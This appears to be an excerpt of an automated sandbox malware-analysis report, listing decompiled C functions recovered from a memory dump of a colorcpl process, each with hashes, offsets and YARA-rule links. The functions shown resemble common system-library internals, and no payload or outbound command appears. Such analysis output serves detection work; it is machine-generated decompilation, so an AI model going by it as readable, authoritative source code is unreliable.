                                                                                                • Instruction Fuzzy Hash: FD21D136A00328EFDBA0EF69DC80EFBBBBDEF85644F115059E90597610D630AE41D7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E19100 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E06E19100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x6eef6e8);
				E06E6D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E06EE88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E06E6D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x6f086c0; // 0xe207b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x6f086b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E06E32280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E06EE88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E06E5AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x6f0b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x6f084c0;
										if(_t69 >=  *0x6f084c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E06EE9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E06E1922A(_t82);
							_t53 = E06E37D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E06EE8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x6f086c0; // 0xe207b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x6f086b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x6f086bc;
										_t72 = 0x6f086b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E06E19240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x6f086c4;
									_t72 = 0x6f086c0;
									L18:
									E06E49B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                0x06e19100
                                                                                                0x06e19100
                                                                                                0x06e19100
                                                                                                0x06e19100
                                                                                                0x06e19102
                                                                                                0x06e19107
                                                                                                0x06e1910c
                                                                                                0x06e19110
                                                                                                0x06e19115
                                                                                                0x06e19136
                                                                                                0x06e19143
                                                                                                0x06e737e4
                                                                                                0x06e737e4
                                                                                                0x06e19149
                                                                                                0x06e1914e
                                                                                                0x06e1914e
                                                                                                0x06e19117
                                                                                                0x06e1911d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e1911f
                                                                                                0x06e19125
                                                                                                0x00000000
                                                                                                0x06e19151
                                                                                                0x06e19158
                                                                                                0x06e1915d
                                                                                                0x06e19161
                                                                                                0x06e19168
                                                                                                0x06e73715
                                                                                                0x00000000
                                                                                                0x06e1916e
                                                                                                0x06e1916e
                                                                                                0x06e19175
                                                                                                0x06e19177
                                                                                                0x06e1917e
                                                                                                0x06e1917f
                                                                                                0x06e19182
                                                                                                0x06e19182
                                                                                                0x06e19187
                                                                                                0x06e19187
                                                                                                0x06e1918a
                                                                                                0x06e1918d
                                                                                                0x06e1918f
                                                                                                0x06e19192
                                                                                                0x06e19195
                                                                                                0x06e19198
                                                                                                0x06e19198
                                                                                                0x06e19198
                                                                                                0x06e1919a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7371f
                                                                                                0x06e73721
                                                                                                0x06e73727
                                                                                                0x06e7372f
                                                                                                0x06e73733
                                                                                                0x06e73735
                                                                                                0x06e73738
                                                                                                0x06e7373b
                                                                                                0x06e7373d
                                                                                                0x06e73740
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73746
                                                                                                0x06e73749
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7374f
                                                                                                0x06e73751
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73757
                                                                                                0x06e73759
                                                                                                0x06e7375c
                                                                                                0x06e7375c
                                                                                                0x06e7375e
                                                                                                0x06e7375e
                                                                                                0x06e73761
                                                                                                0x06e73764
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73766
                                                                                                0x06e73768
                                                                                                0x06e737a3
                                                                                                0x06e737a3
                                                                                                0x06e737a5
                                                                                                0x06e737a7
                                                                                                0x06e737ad
                                                                                                0x06e737b0
                                                                                                0x06e737b2
                                                                                                0x06e737bc
                                                                                                0x06e737c2
                                                                                                0x06e737c2
                                                                                                0x06e737b2
                                                                                                0x06e19187
                                                                                                0x06e19187
                                                                                                0x06e1918a
                                                                                                0x06e1918d
                                                                                                0x06e1918f
                                                                                                0x06e19192
                                                                                                0x06e19195
                                                                                                0x00000000
                                                                                                0x06e19195
                                                                                                0x00000000
                                                                                                0x06e19187
                                                                                                0x06e7376a
                                                                                                0x06e7376a
                                                                                                0x06e7376c
                                                                                                0x06e7376c
                                                                                                0x06e7376f
                                                                                                0x06e73775
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73777
                                                                                                0x06e73779
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73782
                                                                                                0x06e73787
                                                                                                0x06e73789
                                                                                                0x06e73790
                                                                                                0x06e73790
                                                                                                0x06e7378b
                                                                                                0x06e7378b
                                                                                                0x06e7378b
                                                                                                0x06e73792
                                                                                                0x06e73795
                                                                                                0x06e73795
                                                                                                0x06e73798
                                                                                                0x06e73798
                                                                                                0x06e7379b
                                                                                                0x06e7379b
                                                                                                0x06e191a3
                                                                                                0x06e191a9
                                                                                                0x06e191b0
                                                                                                0x06e191b4
                                                                                                0x06e191b4
                                                                                                0x06e191bb
                                                                                                0x06e191c0
                                                                                                0x06e191c5
                                                                                                0x06e191c7
                                                                                                0x06e737da
                                                                                                0x06e191cd
                                                                                                0x06e191cd
                                                                                                0x06e191cd
                                                                                                0x06e191d2
                                                                                                0x06e191d5
                                                                                                0x06e19239
                                                                                                0x06e19239
                                                                                                0x06e191d7
                                                                                                0x06e191db
                                                                                                0x06e191e1
                                                                                                0x06e191e7
                                                                                                0x06e191fd
                                                                                                0x06e19203
                                                                                                0x06e1921e
                                                                                                0x06e19223
                                                                                                0x00000000
                                                                                                0x06e19223
                                                                                                0x06e19205
                                                                                                0x06e19208
                                                                                                0x06e1920c
                                                                                                0x06e19214
                                                                                                0x06e19214
                                                                                                0x06e191e9
                                                                                                0x06e191e9
                                                                                                0x06e191ee
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191e7
                                                                                                0x00000000
                                                                                                0x06e191db
                                                                                                0x06e19187
                                                                                                0x06e19168

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 88cf39902e1e74573ca26bd87b75fd97afbbae8f5b3551457c3e2b481abb596a
                                                                                                • Instruction ID: 1a604cf62003c2e52121b29809089120679eab59a92e820b991fd67b602272d3
                                                                                                • Opcode Fuzzy Hash: 88cf39902e1e74573ca26bd87b75fd97afbbae8f5b3551457c3e2b481abb596a
                                                                                                • Instruction Fuzzy Hash: 20311670F10344DFEBE1DB68C4587ADB7F9BB49358F16A159C4156B242C330A9C8DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E30050 Relevance: .1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E06E30050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x6f0d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E06E49ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E06E5B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E06EE8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E06E49702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x6f0b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                0x06e30055
                                                                                                0x06e3005d
                                                                                                0x06e30062
                                                                                                0x06e3006c
                                                                                                0x06e3006f
                                                                                                0x06e30074
                                                                                                0x06e3007a
                                                                                                0x06e3007a
                                                                                                0x06e30080
                                                                                                0x06e30080
                                                                                                0x06e30087
                                                                                                0x06e3008d
                                                                                                0x06e3008f
                                                                                                0x06e30093
                                                                                                0x06e30095
                                                                                                0x06e3009b
                                                                                                0x06e300f8
                                                                                                0x06e300fb
                                                                                                0x06e300fc
                                                                                                0x06e300ff
                                                                                                0x06e30108
                                                                                                0x06e30108
                                                                                                0x06e300a2
                                                                                                0x06e300a6
                                                                                                0x06e300b3
                                                                                                0x06e300bc
                                                                                                0x06e300c5
                                                                                                0x06e300ca
                                                                                                0x06e7c01e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7c02d
                                                                                                0x06e300d5
                                                                                                0x06e300d9
                                                                                                0x06e7c03d
                                                                                                0x06e7c046
                                                                                                0x06e7c046
                                                                                                0x06e300df
                                                                                                0x06e300e2
                                                                                                0x06e300ea
                                                                                                0x06e300ef
                                                                                                0x06e300f2
                                                                                                0x06e300f6
                                                                                                0x06e30111
                                                                                                0x06e30117
                                                                                                0x06e30117
                                                                                                0x00000000
                                                                                                0x06e300f6
                                                                                                0x06e300d0
                                                                                                0x06e300d0
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 170940a19c7795bf0e2035098dd21b43ce706ceab9a5e70e5fb02051f50a2981
                                                                                                • Instruction ID: 5babf00cfcacbb44cf51876bc7659e516a39131e39dc55c79f21ae1774b962f3
                                                                                                • Opcode Fuzzy Hash: 170940a19c7795bf0e2035098dd21b43ce706ceab9a5e70e5fb02051f50a2981
                                                                                                • Instruction Fuzzy Hash: DC31C131611B04CFD7A1CF28C884B97B3E5FF88714F14596DE5AA87790EB71A801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E96C0A Relevance: .1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E06E96C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E06E37D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x6f07b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L06E34620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E06E5F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E06E37D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E06E59AE0();
						_t23 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                0x06e96c0a
                                                                                                0x06e96c0f
                                                                                                0x06e96c10
                                                                                                0x06e96c13
                                                                                                0x06e96c15
                                                                                                0x06e96c19
                                                                                                0x06e96c1c
                                                                                                0x06e96c21
                                                                                                0x06e96c28
                                                                                                0x06e96c3a
                                                                                                0x06e96c2a
                                                                                                0x06e96c33
                                                                                                0x06e96c33
                                                                                                0x06e96c3f
                                                                                                0x06e96c48
                                                                                                0x06e96c4d
                                                                                                0x06e96c60
                                                                                                0x06e96c65
                                                                                                0x06e96c69
                                                                                                0x06e96c73
                                                                                                0x06e96c79
                                                                                                0x06e96c7f
                                                                                                0x06e96c86
                                                                                                0x06e96c90
                                                                                                0x06e96c94
                                                                                                0x06e96ca6
                                                                                                0x06e96cb2
                                                                                                0x06e96cbd
                                                                                                0x06e96cbd
                                                                                                0x06e96cc3
                                                                                                0x06e96cc7
                                                                                                0x06e96ccb
                                                                                                0x06e96cd0
                                                                                                0x06e96cd1
                                                                                                0x06e96ce2
                                                                                                0x06e96ce2
                                                                                                0x06e96c69
                                                                                                0x06e96ced

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cef73e676c4b7d206b6ed2804e0d2de648ad1ea635ade7b9b0c54bf41c97fc41
                                                                                                • Instruction ID: 9a751d5c2802ea298ef6af4610225b1923cefe4540ca216f7b327b05e5c3c3f5
                                                                                                • Opcode Fuzzy Hash: cef73e676c4b7d206b6ed2804e0d2de648ad1ea635ade7b9b0c54bf41c97fc41
                                                                                                • Instruction Fuzzy Hash: 2F21ABB1A00654AFDB51DF68D884E6AB7B8FF48704F0400AAF904CB791D734ED10CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E590AF Relevance: .1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E06E590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E06E6D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E06E4E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L06E34620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E06E5F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E06E4A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                0x06e590af
                                                                                                0x06e590b8
                                                                                                0x06e590bb
                                                                                                0x06e590bf
                                                                                                0x06e590c2
                                                                                                0x06e590c2
                                                                                                0x06e590c8
                                                                                                0x06e590cb
                                                                                                0x06e590cd
                                                                                                0x06e914d7
                                                                                                0x06e914eb
                                                                                                0x06e914eb
                                                                                                0x00000000
                                                                                                0x06e914eb
                                                                                                0x06e914db
                                                                                                0x06e914e6
                                                                                                0x00000000
                                                                                                0x06e914f2
                                                                                                0x06e914e8
                                                                                                0x00000000
                                                                                                0x06e914e8
                                                                                                0x06e590d8
                                                                                                0x06e590da
                                                                                                0x06e590dd
                                                                                                0x06e590e5
                                                                                                0x00000000
                                                                                                0x06e59139
                                                                                                0x06e590fa
                                                                                                0x06e590fe
                                                                                                0x06e59142
                                                                                                0x00000000
                                                                                                0x06e59142
                                                                                                0x06e59104
                                                                                                0x06e59107
                                                                                                0x06e5910b
                                                                                                0x06e59110
                                                                                                0x06e59118
                                                                                                0x06e59147
                                                                                                0x06e59148
                                                                                                0x06e5914f
                                                                                                0x06e59150
                                                                                                0x06e59151
                                                                                                0x06e59152
                                                                                                0x06e59156
                                                                                                0x06e5915d
                                                                                                0x06e59160
                                                                                                0x06e59168
                                                                                                0x06e5916c
                                                                                                0x06e591bc
                                                                                                0x06e591be
                                                                                                0x00000000
                                                                                                0x06e591be
                                                                                                0x06e5916e
                                                                                                0x06e59173
                                                                                                0x06e59176
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e5917c
                                                                                                0x06e59180
                                                                                                0x06e591b5
                                                                                                0x00000000
                                                                                                0x06e591b5
                                                                                                0x06e59182
                                                                                                0x06e59185
                                                                                                0x06e59189
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e5918e
                                                                                                0x06e59190
                                                                                                0x06e59198
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e591a0
                                                                                                0x00000000
                                                                                                0x06e591ad
                                                                                                0x06e591ad
                                                                                                0x06e591b0
                                                                                                0x06e591b1
                                                                                                0x00000000
                                                                                                0x06e59185
                                                                                                0x06e5911a
                                                                                                0x06e5911c
                                                                                                0x06e5911f
                                                                                                0x06e59125
                                                                                                0x06e59127
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction ID: bdf390d9e194f9cf70265371c7c82be6b82ebfdc8be52e376b7948d99671a824
                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction Fuzzy Hash: B721AF71A00355EFDB60DF69C944AAAF7FCEF44314F16986AE959A7201D330AD04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E43B7A Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E06E43B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x6f084c4; // 0x0
				_v12 = 1;
				_v8 =  *0x6f084c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x6f084c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E06E5AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E06E5FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x6f084c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x6f084c4; // 0x0
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                0x06e43b89
                                                                                                0x06e43b96
                                                                                                0x06e43ba1
                                                                                                0x06e43bab
                                                                                                0x06e43bb5
                                                                                                0x06e43bb9
                                                                                                0x06e86298
                                                                                                0x06e43bbf
                                                                                                0x06e43bc2
                                                                                                0x06e43bc3
                                                                                                0x06e43bc9
                                                                                                0x06e43bca
                                                                                                0x06e43bcc
                                                                                                0x06e43bcd
                                                                                                0x06e43bd4
                                                                                                0x06e43bd6
                                                                                                0x06e43bdb
                                                                                                0x06e43bea
                                                                                                0x06e43bf7
                                                                                                0x06e43bfb
                                                                                                0x06e43bff
                                                                                                0x06e43c09
                                                                                                0x06e43c0a
                                                                                                0x06e43c0b
                                                                                                0x06e43c0f
                                                                                                0x06e43c14
                                                                                                0x06e43c18
                                                                                                0x06e43c18
                                                                                                0x06e43bfb
                                                                                                0x06e43c1b
                                                                                                0x06e43c30
                                                                                                0x06e43c30
                                                                                                0x06e43c3d

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
